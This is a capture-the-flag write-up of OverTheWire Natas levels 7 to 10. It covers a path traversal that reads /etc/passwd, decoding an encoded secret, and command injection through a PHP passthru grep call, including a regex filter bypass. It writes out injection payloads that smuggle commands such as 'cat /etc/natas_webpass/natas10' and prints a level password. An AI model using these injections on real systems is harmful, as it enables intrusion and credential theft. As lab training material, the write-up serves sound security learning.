Natas7-10

nurfitri
Natas7-10

NATAS7

  • here we see a blank with navigation link.
  • inspecting source code, we noticed that the site resolve the page via the page query. index.php?page
  • input index.php?page=home, will yield a home page.
  • but let's try input something that doesn't exits such as index.php?page=l33t
  • we got warning looks like this.
warnings
  • here the warning explain, that php code trying to include anything that we input as the query.
  • it doesn't even sanities the input.
  • this might results in file traversal attack, where we can make use of the include() method to navigate around filesystem.
  • noted that we might not be able to view files, that we have no permission to look at.
  • here we can manipulate the query params like this index.php?page=../
  • this results in page trying to include /var/www/natas
  • which maybe a directory one up above current page directories.
  • we can try to traverse to /etc/passwd directory and we got the content of it.
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
sys:x:3:3:sys:/dev:/usr/sbin/nologin 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/usr/sbin/nologin 
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  • we can navigate to other path if we want, let say /etc/mysql/my.cnf
  • but let now try to navigate to /etc/natas_webpass/natas8
  • here we found our password.
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

NATAS8

  • here we see another input field that check for secret.
  • inspecting the code, we see the secret but encoded.
  • analysing the code, we found out that the secret are encoded via this process:
    • based64_encode() -> strrev() -> bin2hex()
  • all we got to do to decode this is to reverse the encoding process.
    • hex2bin() -> strrev() -> base64_decode()
  • there are multiple ways to solve this, via online tools, php function or just your linux os.
  • in linux, we can manipulate hex value using xxd command.
  • to manipulate base64 string we can use build in base64 command.
  • to reverse string we can use rev command.

xxd

  • to turn a string into a hex we can use it like this
echo "ourString" | xxd -p
  • -p options simply print it in a plain format.
  • to reverse the process we use -r.
  • let's try it on our encodedSecret.
echo 3d3d516343746d4d6d6c315669563362 | xxd -r -p
  • we get this which looks like a base64 format but in reverse.
==QcCtmMml1ViV3b

rev

  • reversing a string is simple, simply run
echo "hello" | rev

and it will produce

olleh
  • lets try it on our previous output.
echo ==QcCtmMml1ViV3b | rev

now we got the correct base64 format

b3ViV1lmMmtCcQ==

base64

  • to create a base64 string simply run
echo "hello" | base64

and we will get

aGVsbG8K
  • to decode it we use the -d tag.
  • lets try it on our previous output.
echo b3ViV1lmMmtCcQ== | base64 -d

we will get

oubWYf2kBq
  • alternatively we can just combine all of the command in one line by piping each output to another.
echo 3d3d516343746d4d6d6c315669563362 | xxd -r -p | rev | base64 -d
  • let's try to use this in the input field.
  • and we got the password.
Access granted. The password for natas9 is XXXXXXXXXXXXXXXXXXXXXXXXXX

NATAS9

  • here we see another input that take our input as search keywords.
  • future inspecting the source, we see that it use passthru on our input.
  • reading the docs, explain that, passthru enable us to pass os command and get the output data.
  • we notice that the passthru function in this code, use grep to search for text.
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}
if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>
  • we know that using grep command we can read content of a file.
  • the webpage do not sanitize our input, thus we are able to break the code and perform code injection attack.
  • we can alter our input to make it execute something like this
//our input is:  root /etc/passwd # 
passthru("grep -i root /etc/passwd # dictionary.txt")
  • because the code simply append our input directly into the function
  • we are able to inject our own command into it. by manipulating the ways linux execute command.
  • doing above example we got this output.
root:x:0:0:root:/root:/bin/bash
  • let us now, view the content of /etc/natas_webpass/natas10
//our input is: '' /etc/natas_webpass/natas10 #
passthru("grep -i '' /etc/natas_webpass/natas10 # dictionary.txt")

  • then we got the password

  • alternatively we can break command like this

//our input is: '' test.txt & cat /etc/natas_webpass/natas10 #
passthru("grep -i '' test.txt & cat /etc/natas_webpass/natas10 # dictionary.txt")
//or
//our input is: '' . ; cat /etc/natas_webpass/natas10 #
passthru("grep -i '' . ; cat /etc/natas_webpass/natas10 # dictionary.txt")
  • there are multiple ways to do it.

NATAS10

  • this level is same as level9 but our input get filtered by regex.
  • let us inspect the regex
/[;|&]/
  • what it does is , it check for any character inside list denoted by the []
  • based on it we know that it check for ;, | and & character. only this two.
  • from our previous exploit. we don't actually use these characters.
  • so we can simply run the same exploit again but change file to natas11
  • then we got the password